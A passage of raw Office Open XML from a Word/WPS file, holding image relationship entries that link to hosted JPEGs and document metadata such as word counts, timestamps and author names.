Target="media/image24.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624349_60b7485d071ee54cce32f.jpg!small" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624348_60b7485c90a79d4e24a7c.jpg!small" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624348_60b7485c36e1906558925.jpg!small" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624347_60b7485b96124f077046a.jpg!small" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624347_60b7485b272ea8e432737.jpg!small" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624346_60b7485aa6ba7fd22fe5c.jpg!small" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624324_60b74844624a51b8f17b6.jpg!small" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624346_60b7485a1fedfafd8bbf8.jpg!small" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624345_60b748597bae8d2031504.jpg!small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image.3001.net/images/20210602/1622624344_60b74858d59c499d9ddda.jpg!small" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://image.3001.net/images/20210602/1622624344_60b748582db4548534c05.jpg!small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image.3001.net/images/20210602/1622624342_60b74856e3ed34dee7a9b.jpg!small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image.3001.net/images/20210602/1622624341_60b74855f30938d8dfa3e.jpg!small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image.3001.net/images/20210602/1622624340_60b74854f1c7b95833b79.jpg!small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image.3001.net/images/20210602/1622624339_60b74853d50b579ada794.jpg!small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image.3001.net/images/20210602/1622624338_60b74852c10ea9f6b8674.jpg!small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image.3001.net/images/20210602/1622624337_60b74851c3871d3006a24.jpg!small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image.3001.net/images/20210602/1622624337_60b7485119b9cf1f09993.jpg!small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image.3001.net/images/20210602/1622624336_60b748505f86a5c1d7496.jpg!small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image.3001.net/images/20210602/1622624335_60b7484f3ea4e35f5ac72.jpg!small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image.3001.net/images/20210602/1622624334_60b7484e815012a66ffc6.jpg!small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image.3001.net/images/20210602/1622624333_60b7484dcfb23ed26d05d.jpg!small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7558</Words>
  <Characters>12310</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12428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2023-03-29T07:01:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>WPS_1665725390</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-29T11:58:59Z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CE7E268F78754F36A75A50BADDAB3B63</vt:lpwstr>
  </property>
</Properties>
</file>